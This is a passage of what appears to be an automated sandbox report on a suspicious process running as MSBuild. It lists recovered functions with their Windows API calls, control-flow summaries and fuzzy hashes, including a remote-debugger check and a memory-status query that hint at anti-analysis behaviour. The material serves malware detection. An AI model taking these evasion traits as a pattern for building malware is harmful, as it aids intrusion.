                                                control_flow_graph 2693 667bd98-667bdb7 2695 667bde3-667bde7 2693->2695 2696 667bdb9-667bdc6 call 667af70 2693->2696 2697 667bdfb-667be3c 2695->2697 2698 667bde9-667bdf3 2695->2698 2703 667bddc 2696->2703 2704 667bdc8 2696->2704 2705 667be3e-667be46 2697->2705 2706 667be49-667be57 2697->2706 2698->2697 2703->2695 2750 667bdce call 667c033 2704->2750 2751 667bdce call 667c040 2704->2751 2705->2706 2707 667be7b-667be7d 2706->2707 2708 667be59-667be5e 2706->2708 2710 667be80-667be87 2707->2710 2711 667be60-667be67 call 667af7c 2708->2711 2712 667be69 2708->2712 2709 667bdd4-667bdd6 2709->2703 2713 667bf18-667bfd8 2709->2713 2714 667be94-667be9b 2710->2714 2715 667be89-667be91 2710->2715 2717 667be6b-667be79 2711->2717 2712->2717 2745 667bfe0-667c00b GetModuleHandleW 2713->2745 2746 667bfda-667bfdd 2713->2746 2718 667be9d-667bea5 2714->2718 2719 667bea8-667beb1 call 6674388 2714->2719 2715->2714 2717->2710 2718->2719 2725 667beb3-667bebb 2719->2725 2726 667bebe-667bec3 2719->2726 2725->2726 2727 667bec5-667becc 2726->2727 2728 667bee1-667beee 2726->2728 2727->2728 2730 667bece-667bede call 6679558 call 667af8c 2727->2730 2734 667bf11-667bf17 2728->2734 2735 667bef0-667bf0e 2728->2735 2730->2728 2735->2734 2747 667c014-667c028 2745->2747 2748 667c00d-667c013 2745->2748 2746->2745 2748->2747 2750->2709 2751->2709
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0667BFFE
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 9fc6536030a5d8cbf69325561215bfa53924a99753723f099d549c98de741e99
                                                • Instruction ID: 5f70d80bd8b669a5d755b8636cb3cc4fb051acbcd10aa346bcf076a44e624aff
                                                • Opcode Fuzzy Hash: 9fc6536030a5d8cbf69325561215bfa53924a99753723f099d549c98de741e99
                                                • Instruction Fuzzy Hash: C08142B0A00B458FD7A4DF2AC44475ABBF1FF88200F108A6ED09AD7B50DB35E845CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02DDF321 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2752 2ddf321-2ddf33b 2753 2ddf33d-2ddf364 2752->2753 2754 2ddf365-2ddf37b 2752->2754 2775 2ddf37d call 2ddf408 2754->2775 2776 2ddf37d call 2ddf321 2754->2776 2757 2ddf382-2ddf384 2758 2ddf38a-2ddf3e9 2757->2758 2759 2ddf386-2ddf389 2757->2759 2766 2ddf3ef-2ddf47c GlobalMemoryStatusEx 2758->2766 2767 2ddf3eb-2ddf3ee 2758->2767 2771 2ddf47e-2ddf484 2766->2771 2772 2ddf485-2ddf4ad 2766->2772 2771->2772 2775->2757 2776->2757
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3008297970.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2dd0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39461e72f6f156cb4f58bf9653950064c7ee9cc34f237528404c07ddc40c7925
                                                • Instruction ID: ecb46c1e639b24d4a3d55d85c52c0a2614e47df3de6bd54388d7b40da590ff5c
                                                • Opcode Fuzzy Hash: 39461e72f6f156cb4f58bf9653950064c7ee9cc34f237528404c07ddc40c7925
                                                • Instruction Fuzzy Hash: 21412372E043998FCB00CFB9D80479EBFF1EF89210F1585AAD448A7691DB389845CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0667DF84 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0667E0A2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 4123b614345ccc4235b2e7eeee30744c94643e07b2d5a5c10f582a3eabcecad4
                                                • Instruction ID: f2ac3cc46a74a0f56fdc089ab947b33c331b9dd3ab14de09b7d1d47b11e49f9e
                                                • Opcode Fuzzy Hash: 4123b614345ccc4235b2e7eeee30744c94643e07b2d5a5c10f582a3eabcecad4
                                                • Instruction Fuzzy Hash: 2251C0B1D10349DFDB14CFA9C884ADEBBB5FF48314F64852AE818AB210DB719895CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0667DF90 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0667E0A2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: b16c24e57a9f272ca8ae0757b10e1906a7e9648919daab4c146941a60a360c25
                                                • Instruction ID: 818564cbce6ced5b7978ee13ef8a889c3cc83748ce9b7ebad1b0562415e254a9
                                                • Opcode Fuzzy Hash: b16c24e57a9f272ca8ae0757b10e1906a7e9648919daab4c146941a60a360c25
                                                • Instruction Fuzzy Hash: 2641D1B1D10349DFDB14CF99C884ADEBBB5FF48314F24852AE818AB210D7719885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02DD70A0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02DD711F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3008297970.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2dd0000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: a5d7163c7953c88ddbf59fa589455afcc4c7f714d7726d3b2bb59f9d8cef4ae8
                                                • Instruction ID: c1f27b7a33d8135b1edd26ec391cc22ce44d28943b62c12f5c5c5d5f3875a205
                                                • Opcode Fuzzy Hash: a5d7163c7953c88ddbf59fa589455afcc4c7f714d7726d3b2bb59f9d8cef4ae8
                                                • Instruction Fuzzy Hash: B02139B19002598FDB10CF99D445BEEFBF4EF49320F24846AE459A7351D778A944CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06673AD8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06673B67
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: debeb1ca228e809fa5a4db263e263d6b47b7f42b4226e3d91b75916503bc1e2f
                                                • Instruction ID: 7252fd998cf4c3ae64795b88708f5da7bc36ca2e621044967decaeba839070d4
                                                • Opcode Fuzzy Hash: debeb1ca228e809fa5a4db263e263d6b47b7f42b4226e3d91b75916503bc1e2f
                                                • Instruction Fuzzy Hash: C821E3B5D00258EFDB10CFAAD984ADEBFF8EB48710F14841AE958A7350D374A940CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06673AE0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06673B67
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 338f48c92921c093a9043ed30f8b2e3d56ef1dd38ce85392829a9430683671b4
                                                • Instruction ID: c8dc0400fa9699b150fc0f56c26b51b9fb18fc20c06bd230ce6c74e5b11c869d
                                                • Opcode Fuzzy Hash: 338f48c92921c093a9043ed30f8b2e3d56ef1dd38ce85392829a9430683671b4
                                                • Instruction Fuzzy Hash: 6E21C4B5D00258DFDB10CFAAD984ADEBBF4EB48710F14841AE958A7350D374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0667C1FB Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0667C079,00000800,00000000,00000000), ref: 0667C26A
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: ecf263f608e97983e04da8f2de3cafa769ebb704ff9ae6d08212cf0ed108a1a0
                                                • Instruction ID: 3dc9733d6a7938a8f98530290c47d573d94e3374a5608822116821684d355706
                                                • Opcode Fuzzy Hash: ecf263f608e97983e04da8f2de3cafa769ebb704ff9ae6d08212cf0ed108a1a0
                                                • Instruction Fuzzy Hash: 6D1112B6C002499FCB20CFAAD844ADEFBF8EB49310F14842AE469A7210C375A544CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0667AFB8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0667C079,00000800,00000000,00000000), ref: 0667C26A
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 35caedc22a68428302b55aeac30c380fbd25b691e1861a56efdbf0aaec60f884
                                                • Instruction ID: 65f51f9ca65330305feef16cbbd3829cec53198455212987a783350f274f1e20
                                                • Opcode Fuzzy Hash: 35caedc22a68428302b55aeac30c380fbd25b691e1861a56efdbf0aaec60f884
                                                • Instruction Fuzzy Hash: 7711D0B6D002499FDB10DFAAC844ADEFBF4EB48710F10842AE569A7210C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02DDF408 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 02DDF46F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3008297970.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2dd0000_MSBuild.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: ef36ff9ff3f0dddbd1e55eb4105c4a650d51a6a93d4e1ceff9eb312231580f62
                                                • Instruction ID: c38ac75a6660c64a5e52db2a436524a02e3732e7b178236f7c562457708c4ab7
                                                • Opcode Fuzzy Hash: ef36ff9ff3f0dddbd1e55eb4105c4a650d51a6a93d4e1ceff9eb312231580f62
                                                • Instruction Fuzzy Hash: 3F111FB1C0066A9FCB10CF9AC544BDEFBF4FB48320F10816AD858A7250D378A940CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0667BF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0667BFFE
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 191f7f2728995c3e9e8c4860078247a816c4f798f5e76f01723d19c1131dad91
                                                • Instruction ID: 162765f36f5b12193682cd4200dc3c10463b855153cd0c1d96f18e96200cc1a1
                                                • Opcode Fuzzy Hash: 191f7f2728995c3e9e8c4860078247a816c4f798f5e76f01723d19c1131dad91
                                                • Instruction Fuzzy Hash: 0811E0B5C002498FCB10CF9AC444BDEFBF4EB88324F10842AD469A7210D379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EDB78 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                • Opcode ID: 79b19a6f61006f22f6a63c17af2720fcef9ed830bee5d220c4c42dbb22d6605c
                                                • Instruction ID: 56cba3b80d0eca9a4dc463e964365cf6ff1fa44574560efca395825638f15e9e
                                                • Opcode Fuzzy Hash: 79b19a6f61006f22f6a63c17af2720fcef9ed830bee5d220c4c42dbb22d6605c
                                                • Instruction Fuzzy Hash: 9E41B0B0F112099FDB61DFA5C55429EBBB6BF85740F204529D405EB344EBB0D842CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EDB65 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                • Opcode ID: 32248daed3bef1131805371aa71bd3ab9d04dc9c7f95f19bb1b914c40d8e4026
                                                • Instruction ID: 97fd7d0517c02bce2f5984fca245b8425febda0692545640d527bbb69bb95cff
                                                • Opcode Fuzzy Hash: 32248daed3bef1131805371aa71bd3ab9d04dc9c7f95f19bb1b914c40d8e4026
                                                • Instruction Fuzzy Hash: DB41D1B0E112059FDF21DFB5C95469EBBB6FF85240F10852AE401EB344EBB0D842CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E227D Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                • Opcode ID: 57024d761efdd5373aec8c8387d3d0840a1f4dedec2abdd477e15c95cb4ea5a4
                                                • Instruction ID: af632c81b3a2e4d6dcdd2404dccfdf8a1e26673f467d3ee27cfaa3f1548b8f09
                                                • Opcode Fuzzy Hash: 57024d761efdd5373aec8c8387d3d0840a1f4dedec2abdd477e15c95cb4ea5a4
                                                • Instruction Fuzzy Hash: 37311E30B002019FDB199B34D5A46AE7BABEB85600F20442DD406EB395DE39DD46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E2290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                • Opcode ID: 1856fb910b82afc840ddc526f0e7f392569b88d0e57ea952a66722650791a974
                                                • Instruction ID: 65675bcdd07b5a5a31f61cf0e9c1fdae0db0b3adfbf589cc3e97bfcff2a7c913
                                                • Opcode Fuzzy Hash: 1856fb910b82afc840ddc526f0e7f392569b88d0e57ea952a66722650791a974
                                                • Instruction Fuzzy Hash: 1331ED70B002058FCB599B74D56466F7BABAF89600F20842DD406EB395EE35DE46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E8367 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q
                                                • API String ID: 0-388095546
                                                • Opcode ID: 077868ff57dba89b38e1e7f0b06130a6856f74c34758ebe7bf0faa9f1c168a85
                                                • Instruction ID: f898f8726114f4ca681bfa9c3108bff865d2a432a82c33857f68855534521bbd
                                                • Opcode Fuzzy Hash: 077868ff57dba89b38e1e7f0b06130a6856f74c34758ebe7bf0faa9f1c168a85
                                                • Instruction Fuzzy Hash: D3F08C39E02218DFDF648F80E9446ACB7B9EB40321F2884AAC804E7254D739AD93CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E46F1 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Ocq
                                                • API String ID: 0-2995510325
                                                • Opcode ID: 5a4c15b0570b96943ce87b6b0d680112f17991fbe54b6feccca1d21607a5d72b
                                                • Instruction ID: 6a5af10cdfdaeb868d5f2ef7581ffe10e1769863a96ad54eff2dab28175f30d2
                                                • Opcode Fuzzy Hash: 5a4c15b0570b96943ce87b6b0d680112f17991fbe54b6feccca1d21607a5d72b
                                                • Instruction Fuzzy Hash: 2DF0DA70A11229DFDF24DFA4E869BAEBBB2BF85700F204519E402A7294CB741C46CFC0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EB2C8 Relevance: .3, Instructions: 294COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6067b911092b63b497bda9491bed9c6e1d83fe4dbd4280de74145a6974ecbfd
                                                • Instruction ID: f3c3d022532ff65e6a0f44db336bdce90e6dc5c1c76a8e457b9c0733f57f98f5
                                                • Opcode Fuzzy Hash: d6067b911092b63b497bda9491bed9c6e1d83fe4dbd4280de74145a6974ecbfd
                                                • Instruction Fuzzy Hash: 0FA18374E01209DFEF64CF69D6907AEB7B6FB89300F604829E405E7394DA35DC818B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E6290 Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71945263a740758c2adcf9fd8582c336cecf8b756de4a92c6681f4bf3bad74fa
                                                • Instruction ID: 239dd2c1d0aff33d5002533fbeaf4faead86cc96b7787d556d3f4ba196206b34
                                                • Opcode Fuzzy Hash: 71945263a740758c2adcf9fd8582c336cecf8b756de4a92c6681f4bf3bad74fa
                                                • Instruction Fuzzy Hash: D661CF71F010214FCF549A7EC89466FBAD7AFD5620B25443AD80EDB364EEA6DD0287C2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3F41 Relevance: .2, Instructions: 223COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3191b8eb4ac26cbac562f0659868f45711603715ece0d757081c043b9a80c6c
                                                • Instruction ID: 2cb747cbe08c2063b8696cfa5af903d87aea40b35d118baf7f26e1c0595350c4
                                                • Opcode Fuzzy Hash: a3191b8eb4ac26cbac562f0659868f45711603715ece0d757081c043b9a80c6c
                                                • Instruction Fuzzy Hash: A5815D30B012099FDF54DFB4D55466EB7F2AB89304F248529E40AEB394EE35EC468B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E425C Relevance: .2, Instructions: 218COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e44c5709897d545120eb20ce9df8541f83499955e46925d46f1c712dba040016
                                                • Instruction ID: 372f4085ea08cc875d08530b79d7e950811fb155002d4e0cd28e167401607963
                                                • Opcode Fuzzy Hash: e44c5709897d545120eb20ce9df8541f83499955e46925d46f1c712dba040016
                                                • Instruction Fuzzy Hash: 27913C30E1061A8BDF60DF68C880B9DB7B1FF89310F208A99D549AB355DB70AA85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3F50 Relevance: .2, Instructions: 218COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4ba49045c84d78d60fb5ace58be97979f5c4107e47852d67fd2825069fffde3
                                                • Instruction ID: 301a914f89158a81939f95e17d9567c73a2557d7e3edb89ec800ed3cb45ee9ab
                                                • Opcode Fuzzy Hash: e4ba49045c84d78d60fb5ace58be97979f5c4107e47852d67fd2825069fffde3
                                                • Instruction Fuzzy Hash: 8F814C30B112099FDF54DFB9D45466EB7F2EB89304F108929E40AEB394EE35EC468B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E4270 Relevance: .2, Instructions: 210COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 734f0f46564eb266f042cbaa087698e76f4968ef54bc5bbb15b2324821380049
                                                • Instruction ID: df48ecc498bc33133f4f45dc5bb69970fb48c7cc38cd3eda5cfed635e19baa7e
                                                • Opcode Fuzzy Hash: 734f0f46564eb266f042cbaa087698e76f4968ef54bc5bbb15b2324821380049
                                                • Instruction Fuzzy Hash: 2D913C30E106198BDF60DF68C880B9DB7B1FF99300F208699D549AB355EB70AE85CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EEBAF Relevance: .2, Instructions: 204COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64fedb08617b5d8f3c16c27531dfb8830504cd333c22b7413fe3f89932bbed9d
                                                • Instruction ID: 97d5499e05f463d85758b5db48c3bf173caa6050f43706a229e848ad4dd1bf3d
                                                • Opcode Fuzzy Hash: 64fedb08617b5d8f3c16c27531dfb8830504cd333c22b7413fe3f89932bbed9d
                                                • Instruction Fuzzy Hash: 13714874A016099FCB54EFA9D990A9EBBF6FF88300F248429D415EB365DB31EC46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EEBC0 Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e60e0128430c983e39fd8a074d00947cc8e1a8550d556f8784e9557bde7272b1
                                                • Instruction ID: 7e28913595af5c3f2cbd472f409547a60a673d7aa643ffdb6710cadf1b8c5d21
                                                • Opcode Fuzzy Hash: e60e0128430c983e39fd8a074d00947cc8e1a8550d556f8784e9557bde7272b1
                                                • Instruction Fuzzy Hash: B2712874A016099FDB54EFA9D990A9DBBF6FF88300F248429D415EB364DB31EC46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EFD28 Relevance: .2, Instructions: 178COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8767582f16d370891952e92c25d022dc3f38ebba5d06a6effeed9fb9bf7f7242
                                                • Instruction ID: a7b14f09348fd9c48eccfe296dcf6800a98e32a0808dc24392fd3a182ee5c04e
                                                • Opcode Fuzzy Hash: 8767582f16d370891952e92c25d022dc3f38ebba5d06a6effeed9fb9bf7f7242
                                                • Instruction Fuzzy Hash: FB512231F01105DFDF24AB78E4446AEBBB2FB84315F10887AE10ADB391DB359916CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EFAD9 Relevance: .2, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f5af778d88261a1baa05c21834af4aa6bdbab97bdad29456eaee87a348c850d
                                                • Instruction ID: fe20a76c525ca6793defd48dc7708bb37191f944bab639e37be64778219bb2bd
                                                • Opcode Fuzzy Hash: 5f5af778d88261a1baa05c21834af4aa6bdbab97bdad29456eaee87a348c850d
                                                • Instruction Fuzzy Hash: FE51E834F612049FEF60566CDA6473F3A9AE789710F20482AE40ED77D9CA79CC859392
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EFAE8 Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
